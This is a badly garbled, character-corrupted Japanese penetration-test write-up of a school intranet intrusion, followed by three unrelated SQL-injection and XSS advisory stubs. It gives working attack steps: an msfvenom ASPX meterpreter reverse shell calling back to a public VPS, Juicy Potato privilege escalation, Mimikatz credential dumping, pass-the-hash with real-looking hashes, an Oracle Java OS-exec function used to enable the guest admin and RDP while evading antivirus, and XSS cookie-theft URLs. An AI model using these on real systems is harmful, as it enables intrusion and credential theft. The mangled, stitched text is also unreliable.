0x00ã€ã³ãã©ãããã®åææ¢çŽ¢ æ å ±ã»ã³ã¿ãŒã®æåž«ã«å¿åããŠãåŠæ ¡ã«ã€ã³ãã©ãããæµžéãã¹ãã宿œããããšãèš±å¯ããåŸãåŠæ ¡ã®ã€ã³ãã©ãããã®äœ¿çšã·ã¹ãã ã«é¢ããæ å ±ãåéãå§ããŸããããããã®ã»ãšãã©ã¯ãå ¬éãããŠããªããã¬ãŒã ã¯ãŒã¯ã³ã³ããŒãã³ãã®æ°ããããŒãžã§ã³ã䜿çšããŠãããããæåã®ã¹ãã¥ã¯ãŒãã·ããããã»ã¹ããããããã¯ã«ãªããŸããããããåŠæ ¡ãéããããŸããŸãªWebã·ã¹ãã ãå蚪ããåŸãé©ãã¹ãã·ã¹ãã ãèŠã€ããŸããã åŠæ ¡ã¯å€ãã®æ°ããã·ã¹ãã ã䜿çšããŸããããå€ãã·ã¹ãã ããªãã«ããŸããã§ãããæ€çŽ¢ã®åŸããã®å€ãã·ã¹ãã ã«ãã¡ã€ã«ãã¢ããããŒãããè匱æ§ãããããšã確èªãããŸããã ãã£ã«ã¿ãªã³ã°ããªããã°ãããã¯åãªãæãåºãç©ã§ãããšèšããŸãã ãŸããããã€ã®æšéЬã®éãè¿ããŸããããããç§ã¯éåžžã«å¥åŠãªçŸè±¡ã«ééããŸãããã¢ãªã®å£ãšå äžã«æ¥ç¶ããåŸããªã¿ãŒã³ãã¹ã¯ç°ãªãããã®ãã¡ã€ã«ãç°ãªããŸãã ãã®äžã§ãã¢ãªã®å£ã§æ¥ç¶ãããã·ã§ã«ã¯ãã¡ã€ã«ãã¢ããããŒãããããšã¯ã§ããŸããããå äžã§æ¥ç¶ãããã·ã§ã«ã¯ã§ããŸãããŸããWebShellã¯ã³ãã³ããå®è¡ããåŸã«IPããããã¯ããWAFããããšçãããŸããããã§ãæåã«MSF ASPX Trojanãæž¡ããŠã¡ãŒã¿ãŒãã¬ã¿ãŒã»ãã·ã§ã³ãååŸããŸãã Windows-Exploit-Suggestã䜿çšããŠãæªåããããæ€åºããŸãã MS16-075ã®éåžžã«æçšãªè匱æ§ãããããšãããããŸããã MSFã®Juicy_potatoã¢ãžã¥ãŒã«ãšçŽæ¥ååããŠæ»æããŸãã CLSIDã倿Žããããšãå¿ããªãã§ãã ãããããã§èŠã€ããããšãã§ããŸãã https://github.com/ohpe/juicy-potato/tree/master/clsid ãã€ããŒãçšã®bind_tcpã®ãã©ã¯ãŒãæ¥ç¶ãéžæããããšããå§ãããŸããããããªããšãã·ã§ã«ããããã¢ãã衚瀺ããªãå ŽåããããŸãã ãã®ããã«ããŠãã·ã¹ãã èš±å¯ãååŸãããŸããæ¬¡ã®ã¹ãããã¯ãæ©æ¢°ããæ å ±ãåéããæ°Žå¹³æµžéã«åœ¹ç«ã€æ å ±ãååŸããããšã§ããå¥åŠãªããšã«ããã®ãã·ã³ã«ã¯ããšããšãã¡ã€ã³ããã£ãããšã§ãããä»ã§ã¯æ¶ããŠããŠããã¡ã€ã³å¶åŸ¡ãèŠã€ãããŸããããããã£ãŠãç§ãã¡ã®çŠç¹ã¯ãã¹ã¯ãŒãè¡çªã©ã€ãã©ãªã«ãããŸãã MSFãä»å±ããŠããMimikatzã¢ãžã¥ãŒã«ã䜿çšããŠããã¹ã¯ãŒããååŸããŸãã ç§ã¯2ã€ãŸãã¯3ã€ã®ãã·ã³ã«ã¶ã€ãããŸãããããããã®ããã€ãã¯ããŒã445ãæã£ãŠããŸããããããŒã3389ã¯ãããŸããã§ããã ãã®ããã«ããŠãMS-17010ã䜿çšããŠã¿ãããšãã§ããŸããã䜿çšäžã®äžéšã®ã·ã¹ãã ã«åœ±é¿ãäžããå¯èœæ§ãããããšãèæ ®ãããšãããå®å šãªPSEXECã¢ãžã¥ãŒã«ã䜿çšããŠã©ã€ãã©ãªã«ã¶ã€ããããšãéžæããŸãããã€ãŸããããã·ã¥é ä¿¡ããã¬ãŒã³ããã¹ãã§ååŸã§ããªããã¹ã¯ãŒããçºçãããšãã«ããã¹ã¯ãŒãã®ããã·ã¥å€ããã³ãããŠãããPSEXECã¢ãžã¥ãŒã«ã䜿çšããŠããã·ã¥é ä¿¡ã䜿çšããŠæ»æãè¡ãããšããããŸããç§ãã¡ãåŸãã®ã¯ãã·ã¹ãã èš±å¯ã ãã§ãã ãã®åŸã®æé ã¯éå±ã§ãããããã¯ããã¹ã¯ãŒããåéããããã«ã©ã€ãã©ãªã«çµ¶ããã¶ã€ãããåéããããã¹ã¯ãŒããä»ããŠã©ã€ãã©ãªã«ã¶ã€ããããšã§ãããååãªãã·ã³ãšãã¹ã¯ãŒããååŸããåŸãããŒããŒã«ãŒã¿ãŒãèŠã€ãããŸãããã以åã«åéããããã¹ã¯ãŒããæ£åžžã«ãã°ã€ã³ããããšãã§ããªãã£ãããããããããå¿ èŠããããŸããããã®ãããã¯ãŒã¯ã»ã°ã¡ã³ãã¯çµäºããŸãã 0x01è©³çŽ°ãªæ¢çŽ¢ æ°ããã·ã¹ãã ãæ€çŽ¢ããåŸããã¡ã€ã«ã®ããŠã³ããŒãè匱æ§ãæ©èœã®1ã€ã«ããããšãããããŸããã ãããŠãããã¯ã«ãŒããŠãŒã¶ãŒã«ãã£ãŠéå§ããããµãŒãã¹ã§ããçæ³çãªç¶æ³ã¯ã /etc /Shadowãã¡ã€ã«ãèªã¿åããã«ãŒããŠãŒã¶ãŒã®ãã¹ã¯ãŒããççºãããããšã§ãã ïŒå€±æïŒã次㫠/root/.bash_historyãèªãã§ãã«ãŒããŠãŒã¶ãŒã®æäœå±¥æŽãååŸããŸãã Tomcatã®å±éãšããã¯ã¢ãããœãŒã¹ã³ãŒããã¡ã€ã«ãžã®ãã¹ãèšé²ããŸãããœãŒã¹ã³ãŒããããŠã³ããŒãããŠæ å ±ãåéããããšã«ãããéåžžã«éèŠãªæ å ±ãåéããŸããããã®ãããã¯ãŒã¯ã»ã°ã¡ã³ãã®ã»ãšãã©ã®ãã·ã³ã¯ãOracleããŒã¿ããŒã¹ã䜿çšããŠãããSIDã倿ŽããŠããŸããããŸã 詊ããŠã¿ããã¹ã¯ãŒããããã€ããããŸãã ççºã®åŸãOracleããŒã¿ããŒã¹ã·ã¹ãã ã®ãŠãŒã¶ãŒãã¹ã¯ãŒãã¯å€æŽãããŠãããããããŒãžã£ãŒã§ããããšãããããŸããã誰ããOracleããŒã¿ããŒã¹ãã·ã¹ãã ã³ãã³ããå®è¡ã§ããããšãæå®ããå¿ èŠããããã·ã¹ãã ãŠãŒã¶ãŒã¯ã·ã¹ãã ã³ãã³ããå®è¡ããæ¡ä»¶ãå®å šã«æºãããŠããŸããéå±ãªæé ãåé€ããã³ãã³ããçŽæ¥å®è¡ã§ããããŒã«ããªã³ã©ã€ã³ã§èŠã€ããŸããã 0x03ç«ã®åäœæ€åºããã€ãã¹ ããããå¥ã®å¥åŠãªåé¡ãçºçããŸãããããã€ãã®ã³ãã³ãããå®è¡ã§ããŸããã§ãããç§ã¯ã·ã¹ãã ãŠãŒã¶ãŒã§ãããããããŠãŒã¶ãŒãªã©ã®ã³ãã³ãã䜿çšãããšããšã³ãŒã¯ãããŸããããã®åŸãã¿ãŒããŒã«ãç°åžžãªè¡åãååããããšãããã£ããæ¬¡ã«ãNAVICATã®SQLPLUSã䜿çšããŠãµãŒããŒã«çŽæ¥æ¥ç¶ããããšããŸããããªã³ã©ã€ã³ã®æé ã«ãããšããµãŒããŒã«ãã£ãŠè¿ããã1ãŸãã¯0ã«åºã¥ããŠã³ãã³ããå®è¡ããããã©ããã倿ã§ããŸãã ãoscommandããšããååã®JavaãœãŒã¹ãäœæãŸãã¯äº€æããã³ã³ãã€ã«ããŸã -Java: OSã³ãã³ã java.io.*ãã€ã³ããŒãããŸãã java.langã*ãã€ã³ããŒãããŸãã ãããªãã¯ã¯ã©ã¹ãªã¹ã³ãã³ã{ public static string runïŒstring commandïŒ{ Runtime rt=runtime.getRuntimeïŒïŒ; int rc=-1; 詊ã{ ããã»ã¹p=rt.execïŒcommandïŒ; int bufsize=32000; int len=0; ãã€ããããã¡ãŒ[]=new byte [bufsize]; æåås=null; BufferedInputStream bis=new BufferedInputStreamïŒp.getInputStreamïŒïŒãbufsizeïŒ; len=bis.readïŒbufferã0ãbufsizeïŒ; rc=p.waitforïŒïŒ; ifïŒlenïŒ=-1ïŒ{ s=new StringïŒBufferã0ãLenïŒ; returnïŒsïŒ; } returnïŒrc+''ïŒ; } catchïŒäŸå€eïŒ{ e.printstacktraceïŒïŒ; returnïŒ '-1 \ ncommand [' + command + '] \ n' + e.getmessageïŒïŒïŒ; } } } / ãšã©ãŒã衚瀺ããŸã function osexecïŒccommand in stringïŒreturn varchar2ãäœæãŸãã¯äº€æãã -Function: OS exec -DESCR: PL/SQLã©ãããŒJavaãªã¹ã³ãã³ãä¿åProc - èšèªJava name 'oscommand.runïŒjava.lang.stringïŒreturn java.lang.string'; / ãšã©ãŒã衚瀺ããŸã -sysdbaã Osexecãææãã該åœããã¹ããŒãã«ã¹ã³ããã眮ãæãã - ããã³ãªã¹ã³ãã³ãã¯Procãä¿åããŸããã 宣èšãã ã¹ããŒãvarchar2ïŒ30ïŒ:='scott'; å§ãã dbms_java.grant_permissionïŒ ã¹ããŒãã 'sys:java.io.filepermission'ã ããã¹ãŠã®ãã¡ã€ã«ãã 'å®è¡ãã' ïŒ; dbms_java.grant_permissionïŒ ã¹ããŒãã 'sys:java.lang.runtimepermission'ã ãWriteFileDescriptorãã '*' ïŒ; dbms_java.grant_permissionïŒ ã¹ããŒãã 'sys:java.lang.runtimepermission'ã ãReadFileDescriptorãã '*' ïŒ; å°å¿µ; çµãã; / - ããŒã«ã«æ¥ç¶æ å ±ã衚瀺ããŸã sql select osexecïŒ 'ipconfig'ïŒã¯dualã®stdoutãšããŠã stdout ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ïŒ WindowsIP ? ??? l ? 3: l ? DNS ? ã ã ? t ? IPv6 ? ã ************ IPv4 ? 192.168.100.100 ?? 255.255.255.0 ? 0.0.0.0 - ã²ã¹ãã¢ã«ãŠã³ããæŽ»æ§åããŸã sql select osexecïŒ 'cmd.exe /c net user guest /active:yes'ïŒstdout from dual; stdout ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ïŒ 0ã¢ã³ããŠã€ã«ã¹ãœãããŠã§ã¢ç£èŠOracleã®åäœããããããæ»æããããã«ããã€ãã®éåããªãåäœãçµã¿åãããå¿ èŠããããŸãã ç§ãäºæ³ããŠããªãã£ãã®ã¯ãããŒã3389ãéãããã«ã³ãã³ãã©ã€ã³ãçŽæ¥å®è¡ãããšããTurfurããããååããªãã£ããšããããšã§ãããããããããããŠãŒã¶ãŒããã®ä»ã®ã³ãã³ããå®è¡ãããšãå®è¡ã§ããŸããããã®æç¹ã§ãç§ã¯çªç¶ã²ã¹ããŠãŒã¶ãŒãæãåºããŸãããã²ã¹ããŠãŒã¶ãŒãæå¹ã«ãã管çè ã°ã«ãŒãã«åå ããŸãããä»åã¯ãããã¯ãããŸããã§ããããªã¢ãŒããã¹ã¯ãããã«çŽæ¥æ¥ç¶ããåŸããã·ã³ã§Mimikatzã䜿çšããããã·ã§ã«ãCSã«ãªããŠã³ããããå Žåã«å€±æããŸãã ããã«ããŠãŒã¶ãŒããã®ä»ã®æ©å¯æäœã远å ãããªã©ãã²ã¹ããŠãŒã¶ãŒåãã®äžéšã®ã¢ã¯ã»ã¹èš±å¯ãç¡å¹ã«ãªã£ãŠããŸããããããããããŠãŒã¶ãŒãå®è¡ããŠãããšããç§ã¯ãŠãŒã¶ãŒãèŠã€ããŸãããããã¯ä»¥åã®ãã·ã³ã§èŠãããšãããããã®ãŠãŒã¶ãŒã®ãã¹ã¯ãŒããæã£ãŠããŸãããããã£ãŠãSQLPLUSã䜿çšããŠããã®ãŠãŒã¶ãŒã管çè ã°ã«ãŒãã«è¿œå ããŸãã ãããã£ãŠãã¿ãŒããŒã«ååã®è¡åã«ãŒã«ã¯ããŠãŒã¶ãŒã远å ã§ããªãããæ¢åã®ãŠãŒã¶ãŒã管çè ã°ã«ãŒãã«è¿œå ããããšãã§ããã²ã¹ããŠãŒã¶ãŒãã¢ã¯ãã£ãã«ããããšãã§ãã3389ãéãããšãã§ãããšããããšã§ãããã®ãã·ã³ã«åã³ãã°ã€ã³ããåŸãã·ã§ã«ããªããŠã³ãããŠæ»ã£ããããã¹ã¯ãŒããèªãã ãã§ããŸããã§ããããã®æç¹ã§ãç§ã®ãžã¥ãã¢ã¯ãã¿ãŒã³ã€ãºãçŽæ¥ãªã³ã«ããŠä¿è·ããªãã«ã§ãããšèšã£ãŠãã·ã§ã«ããªããŠã³ãã§ãããšèšã£ãŠããŸãããç§ïŒ ãã®åŸã1åã®æäœã®åŸã«ã·ã§ã«ãååŸããŸããããããã§ããã¬ãŒã³ããã¹ãã®ãã¹ã¯ãŒããèªãããšãã§ããŸããã§ãããããã·ã¥ãæšãŠãŠããçç ŽããããšãèããŸãããããããNTLMã解決ã§ããå€åœã®ãªã³ã©ã€ã³Webãµã€ããããããšãèŠããŠããŸã https://www.objectif-securite.ch/ophcrack ãã¹ã¯ãŒããååŸããåŸãæ å ±ãåéããã®ã¯ããªãã¿ã®ã©ã€ãã©ãªã§ããããã®åŸã©ã€ãã©ãªãã¯ã©ãã·ã¥ããŸãã æ¬¡ã«ãXFTPããµãŒããŒäžã«ããã€ãã®ãµãŒããŒã®ãã¹ã¯ãŒããä¿åããããšãããããŸããããã®æç¹ã§ãç®èãªæäœãèŠã€ããŸããã Asterisk Password ViewerããŒã«ã䜿çšããŠãããã«ä¿åãããŠãããã¹ã¯ãŒãã衚瀺ã§ããŸãã ãŸããããã€ãã®æ ¹ãèš±å¯ãããã·ã³ã«ã€ããŠãèšåããããšæããŸããåŸã§è©ŠéšãããããããŸããã§ãããåéãããã¹ãŠã®ãã¹ã¯ãŒããèšé²ãããããã¯ãŒã¯ã»ã°ã¡ã³ãå šäœã§ãã·ã³ãæŒããŠãå€ãã®åŒ±ããã¹ã¯ãŒããåŒãèµ·ãããŸããã æ®æ¥ããŠãããæ å ±ã»ã³ã¿ãŒã®å çã«ããã§ãšãããããŸãã 0x04èŠçŽ 1ãã¿ãŒã²ããã®å€ãã·ã¹ãã ã®[äœçœ®ãã¢ããããŒãããæ·»ä»ãã¡ã€ã«ã§ãTrojanãçŽæ¥ã¢ããããŒãããŠã¢ããããŒãããããã¹ã«æ»ãããšãã§ããŸãã 2ãã¢ãªã®å£ãéããŠããã€ã®æšéЬãæç« ã«æ¥ç¶ããåŸããã¡ã€ã«ãã¢ããããŒãããããšã¯ã§ããŸãããå äžãä»ããŠæãæ¥ç¶ãããšããã¡ã€ã«ãã¢ããããŒãã§ããŸãã 3.ãããªãã¯ãããã¯ãŒã¯äžã®MSFãä»ããŠASPXããã¯ãã¢ãçæããçæãããshell.aspxããã¬ãŒã·ã¢ãä»ããŠã¿ãŒã²ãããµã€ãã«ã¢ããããŒãããshell.aspxã«ã¢ã¯ã»ã¹ããŸãã msfvenom -p Windows/x64/meterpreter/reverse_tcp lhost=public vps lport=12345 -f aspx shell.aspx4ã MSFãèãããªããŠã³ãã·ã§ã«ã ã¹ãã®äœ¿çšExploit/Multi/HandLermsf ExploitïŒHandlerïŒSet Payload Windows/X64/MeterPreter/Reverse_TCPMSF ExploitïŒHandlerïŒSet LHOST Public VPSMSF ExploitïŒHandlerïŒSet LPort 12345MSF ExploitïŒHandlerïŒExploit5ãå äžã®ã³ãã³ã端åãä»ããŠSystemInfoãä»ããŠãããæ å ±åºåæ å ±ãå®è¡ããããŒã«ã«ã«ããŠã³ããŒãããWindows-Exploit-Suggesterã䜿çšããŠäœ¿çšå¯èœãªãšã¹ã«ã¬ãŒã·ã§ã³POCã䜿çšããŠãMS16-075ïŒãªã³ã©ã€ã³æ¯èŒ:3http://BUGS.HACKING8.com/tiquan/ïŒãèŠã€ããããšãã§ããŸãïŒ https://github.com/1nf1n17yk1ng/windows-exploit-suggesterpython3systeminfo info.txtpython3 windows-exploit-suggester.py -updatepython3 windows-exploit-suggester.py -database 2021-07-15-msb.xls-systeminfp MSFïŒhttps://github.com/secwiki/windows-kernel-exploits/tree/master/MS16-075ïŒã§MS16-075ãééããŸããã C: \ uses \ publicMeterPreter CD C: \ uses \ publicMeterpreter suse incognitemerpreter list_tokens -umeterpreter execute -ch -f ./potato.exemeterpreter list_tokens -umeterpreter getuidserver username: nt authority \ system7ã MIMIKATZãMSFããããŒãããŠããã¬ãŒã³ããã¹ããšããã·ã¥ããªã¥ãŒã¡ãŒã¿ãŒãã¬ã¿ãŒãèªã¿åãããã«Mimikatz_Command -f Samdump33:336033603360336033603360HASSETER -PRETER -F SEKURLSA3:3:SEACHWORDSMETERSMETRETER MSTGET METEXTETECTEXTEXTEXTETMETSMETSMETRETER -MSGTETMETSMETRETER -MSGETMETSMETSMERTERTERTERTER 8ãPTHãã¹ã®ãããããã·ã¥å€è¡çªã©ã€ãã©ãª MeterPreter Upload/Root/CrackMapexec C: \ Users \ PublicMeterPreter CrackMapexec 192.168.1.0/24 -u管çè -H CCEF208C64485269C20DB2CAD21734FE7ãŸãã¯ã¡ãŒã¿ãŒããªã¿ãŒããã¯ã°ã©ãŠã³ãWindows/MeterPreter/Reverse_tcpmsfset lhost 192.168.232.128msfset lport 2222msfset rhosts 10.206.14.1/24msfset smbuser administratorsmbuser=administrationmbuser set smbpass E52CAC67419A9A9A224A3B108F3FA6CB6D:8846F7EEEE8FB117AD06BDD830B7586CMSF RUNãŸãã¯MSF䜿çšSMBPASS AAD3B435B51404EEAAD3B435B51404EE:579110C49145015C47ECD267657D3174ïŒLMããã·ã¥ã¯32ãããæåã«ãªãå¯èœæ§ãããããšã«æ³šæããŠãã ããïŒMSF Run4ãã¿ãŒã²ããã®æ°ããã·ã¹ãã ã§ãã¡ã€ã«ã®ããŠã³ããŒããèŠã€ããŸããããã¡ã€ã«ã®ããŠã³ããŒãã®è匱æ§ããããããããŸãããããã§ã¯ãBPã®äŸµå ¥è æ©èœãä»ããŠãã¡ãºããããã§ããŸããããã§ã¯ãæåã«/etc/passwdãªã©ãèªã¿åããããã·ã¥å€ãèªãã§ãmd5ãéããŠãããå²ãããšãã§ããŸãã 5.次ã«ãä»»æã®ãã¡ã€ã«ãä»ããŠããŠã³ããŒãããŠã /root /.bash_histoyãèªã¿åããã³ã³ãã¬ãã·ã§ã³ã®ããã«Webãµã€ããã£ã¬ã¯ããªã®ç®¡çè ã®æäœã衚瀺ããŸãã Webãµã€ãã«ä¿åãããå§çž®ããã±ãŒãžåãšã«ãŒããã£ã¬ã¯ããªãããŠã³ããŒãããããœãŒã¹ã³ãŒããçŽæ¥ããŠã³ããŒããããŠããã¯ã¢ãããããŸãã 6. OracleããŒã¿ããŒã¹æ§æãã¡ã€ã«ã¯ãœãŒã¹ã³ãŒãã§èŠã€ããããŠãŒã¶ãŒåã·ã¹ãã ãšãã¹ã¯ãŒããæŒããIPã¢ãã¬ã¹ã¯121.1.100.100ãæŒããŸãããããã©ã«ãã®SIDå€ïŒORCLã䜿çšãããšãæ¥ç¶ã§ããŸããããã§ã¯ãOracleshellã䜿çšããŠãªã¢ãŒãã§æ¥ç¶ããŸãã 7.ããããŠãŒã¶ãŒåã远å ããã³ãã³ãã¯Oracleshellãä»ããŠã€ã³ã¿ãŒã»ãããããã¿ã¹ã¯ãªã¹ã/SVCãå®è¡ãããã¿ãŒã²ããããŒã¿ããŒã¹ã«TinderãããããšãããããŸãããã ããçªé¢šã¢ã«ãŠã³ããã¢ã¯ãã£ãã«ãã管çè ã°ã«ãŒãã«çªé¢šã远å ããããšã«ãããã¿ãŒãã¯ãããååããŸããããã®åŸã3389ããªã³ã«ããŠãããããŠãŒã¶ãŒã²ã¹ã /Active:YESNETãŠãŒã¶ãŒã²ã¹ããã¹ã@123NETããŒã«ã«ã°ã«ãŒã管çè ã²ã¹ã /addreg \ currentControlset \ control \ã¿ãŒããã« ''ãµãŒã㌠/v fdenytsconnections /t reg_dword /d dual; sããã®stdoutãšããŠã®osexecïŒ 'ipconfig'ïŒ
-
EasyPHP - 'main.php' SQL Injection
source: https://www.securityfocus.com/bid/52781/info EasyPHP is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/home/sqlite/main.php?dbsel=1&table=t1'
-
ocPortal 7.1.5 - 'code_editor.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/52768/info ocPortal is prone to multiple cross-site scripting vulnerabilities and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information. ocPortal versions prior to 7.1.6 are vulnerable. http://www.example.com/code_editor.php?path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/code_editor.php?path&line=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/site/catalogue_file.php?original_filename=1.txt&file=%252e%252e%252f%252e%252e%252finfo.php
-
PHP Designer 2007 Personal - Multiple SQL Injections
source: https://www.securityfocus.com/bid/52819/info PHP Designer 2007 - Personal is prone multiple SQL-injection vulnerabilities. A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/read_news.php?news_id=[Sqli] http://www.example.com/announce.php?id=[Sqli]